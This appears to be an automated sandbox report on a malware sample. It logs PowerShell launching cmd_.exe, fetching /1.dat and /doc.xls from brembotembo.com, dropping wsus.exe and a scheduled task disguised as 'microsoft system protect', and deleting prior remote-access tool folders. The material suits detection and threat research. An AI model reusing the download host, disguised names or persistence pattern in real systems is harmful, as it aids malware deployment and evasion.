1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | - | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = EXB9WSP |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
10 |
Environment (144)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
132 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\qj4SUKboE |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\qj4SUKboE |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = temp, result_out = C:\Users\QJ4SUK~1\AppData\Local\Temp |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\qj4SUKboE\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = brembotembo.com, address_out = 95.213.251.149 |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 118 bytes |
| Total Data Received | 174.80 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | brembotembo.com |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | brembotembo.com |
| Server Port | 80 |
| Data Sent | 70 |
| Data Received | 561 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = brembotembo.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /1.dat |
|
1 | |
| Send HTTP Request | headers = host: brembotembo.com, connection: Keep-Alive, url = brembotembo.com/1.dat |
|
1 | |
| Read Response | size = 4096, size_out = 561 |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | brembotembo.com |
| Server Port | 80 |
| Data Sent | 48 |
| Data Received | 178435 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = brembotembo.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /doc.xls |
|
1 | |
| Send HTTP Request | headers = host: brembotembo.com, url = brembotembo.com/doc.xls |
|
1 | |
| Read Response | size = 4096, size_out = 1448 |
|
1 | |
| Read Response | size = 65536, size_out = 11584 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 21584 |
|
1 | |
| Read Response | size = 65536, size_out = 63888 |
|
1 | |
| Read Response | size = 14395, size_out = 5808 |
|
1 | |
| Read Response | size = 8587, size_out = 1452 |
|
1 | |
| Read Response | size = 7135, size_out = 1452 |
|
1 | |
| Read Response | size = 5683, size_out = 5683 |
|
1 |
Process #6: cmd_.exe
995
254
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\qj4suk~1\appdata\local\temp\cmd_.exe |
| Command Line | "C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe" |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:06, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:32 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x814 |
| Parent PID | 0x9e4 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
808
0x
BF4
0x
BE0
0x
538
0x
810
0x
B80
0x
B6C
0x
940
0x
8EC
0x
8F4
0x
A18
0x
A30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00270fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0024efff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00268fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00269fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| windowsshell.manifest | 0x002e0000 | 0x002e0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00300fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| oleaccrc.dll | 0x00300000 | 0x00300fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00308fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00309fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x00300000 | 0x0030ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00351fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x00350000 | 0x00357fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x00360000 | 0x00363fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x00390000 | 0x003a3fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| cmd_.exe | 0x00400000 | 0x0042cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x005c0000 | 0x005dffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000d.db | 0x005f0000 | 0x0061ffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0069ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x00830000 | 0x00833fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x00846fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00851fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00860fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x0098ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000990000 | 0x00990000 | 0x01d8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01d90000 | 0x0205efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002160000 | 0x02160000 | 0x0223efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002240000 | 0x02240000 | 0x0233ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002240000 | 0x02240000 | 0x0227ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x0243ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02440000 | 0x024a5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x025affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000025b0000 | 0x025b0000 | 0x029a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02aeffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02b2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02beffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02d1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x02c2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x02d1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d20000 | 0x02d20000 | 0x02f3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| ieframe.dll | 0x72550000 | 0x72fcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ieframe.dll | 0x72fd0000 | 0x73a4ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x73a50000 | 0x73b44fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x73d90000 | 0x73d9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x73db0000 | 0x73dc4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x73dd0000 | 0x73e21fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleacc.dll | 0x73e10000 | 0x73e4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x73e30000 | 0x73e36fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x73e40000 | 0x73e83fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleacc.dll | 0x73e50000 | 0x73e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x73e90000 | 0x7402dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| xmllite.dll | 0x74030000 | 0x7405efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| taskschd.dll | 0x74060000 | 0x740dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74060000 | 0x74080fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x74090000 | 0x740dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mstask.dll | 0x740a0000 | 0x740d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mpr.dll | 0x74bb0000 | 0x74bc1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74bb0000 | 0x74bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74bd0000 | 0x74bdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74d10000 | 0x74d8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| odbcconf.dll | 0x74e60000 | 0x74e69fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptdll.dll | 0x74e70000 | 0x74e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x75060000 | 0x75073fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| certcli.dll | 0x75080000 | 0x750d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x75190000 | 0x75284fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x752e0000 | 0x752f1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x753d0000 | 0x753d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x753e0000 | 0x75436fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x75550000 | 0x7566cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x75670000 | 0x75675fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75680000 | 0x7581cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x75820000 | 0x758a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x758b0000 | 0x758f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x75a30000 | 0x75c2afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x75c30000 | 0x75cbefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75cc0000 | 0x75cf4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75f40000 | 0x7609bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x76140000 | 0x76d89fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76e70000 | 0x76e96fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x76ff0000 | 0x77125fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x775a0000 | 0x775abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 35 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\windows\tasks\microsoft system protect.job | 0.27 KB |
MD5:
3a50aa02030ff89e645423598c8e06fa
SHA1: 0b131b052a57672aab55874a1106703cfcd6163a SHA256: 83a96ed03808a9b12426d9d770f2a4b37d100f66cd271be8ea9c5b814be878e7 |
|
|
| c:\windows\tasks\microsoft system protect.job | 0.27 KB |
MD5:
5803c2d1a7f6a381cbf58b3ce1429dae
SHA1: c038ab19f0df090fb7778042be6c17ddfd585c16 SHA256: 2a8e0c425456503344bd480c83e7151147b474783e1d6d74e3b6d1d5d5b34ed9 |
|
|
| c:\programdata\settings\wsus_41a480.tmp | 646.50 KB |
MD5:
192aead1e464431f616fc210ab18a6af
SHA1: 84e0756eef6e66bd8cc9a42fee4fa69ab21964ca SHA256: ac3fb7067fed4e4db651f8261553d379a980eaa8756202b4a8daa8e88299a2ef |
|
|
| c:\programdata\settings\wsus.exe | 646.50 KB |
MD5:
0be249bf01a6b8380ab31aa3f75e62d3
SHA1: 1caef216eccbc07949836f814dcd9818a4c75d6d SHA256: 7f61258418b89942aa8e7bf2563ce11a05402d3ccf405a18e3d0a4d7a7f9ee41 |
|
|
Host Behavior
COM (9)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 148BD52A-A2AB-11CE-B11F-00AA00530503 | 148BD527-A2AB-11CE-B11F-00AA00530503 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect, user = 1634856, domain = 1984923861 |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, path = \, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_LOGON, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2016-01-01T12:05:00 |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 |
File (278)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\ProgramData\Settings\wsus_41a480.tmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\ProgramData\Settings\wsus_41a480.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Settings\wsus.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create Directory | C:\ProgramData\Settings | - |
|
1 | |
| Get Info | C:\ProgramData\Settings\wsus_41a480.tmp | type = size |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\ProgramData\Settings\wsus_41a480.tmp | size = 662016, size_out = 662016 |
|
1 | |
| Write | - | size = 16 |
|
1 | |
| Write | - | size = 3 |
|
1 | |
| Write | C:\ProgramData\Settings\wsus_41a480.tmp | size = 1024 |
|
249 | |
| Write | C:\ProgramData\Settings\wsus.exe | size = 662016 |
|
1 | |
| Delete Directory | C:\ProgramData\Settings | - |
|
1 | |
| Delete Directory | C:\ProgramData\Microsoft\Enc | - |
|
1 | |
| Delete Directory | C:\ProgramData\AMMYY | - |
|
1 | |
| Delete Directory | C:\ProgramData\Foundation | - |
|
1 | |
| Delete Directory | C:\ProgramData\Foundation1 | - |
|
1 | |
| Delete | C:\ProgramData\AMMYY\wmihost.exe | - |
|
1 | |
| Delete | C:\ProgramData\AMMYY\settings3.bin | - |
|
1 | |
| Delete | C:\ProgramData\Foundation\wmites.exe | - |
|
1 | |
| Delete | C:\ProgramData\Foundation\settings3.bin | - |
|
1 | |
| Delete | C:\ProgramData\Foundation1\wmites.exe | - |
|
1 | |
| Delete | C:\ProgramData\Foundation1\settings3.bin | - |
|
1 | |
| Delete | C:\ProgramData\Microsoft\wsus.exe | - |
|
1 | |
| Delete | C:\ProgramData\Microsoft\settings3.bin | - |
|
1 | |
| Delete | C:\ProgramData\Settings\wsus_41a480.tmp | - |
|
2 | |
| Delete | C:\ProgramData\Settings\wsus.exe | - |
|
1 | |
| Delete | C:\ProgramData\Settings\wsus_41a480.tmp | - |
|
1 |
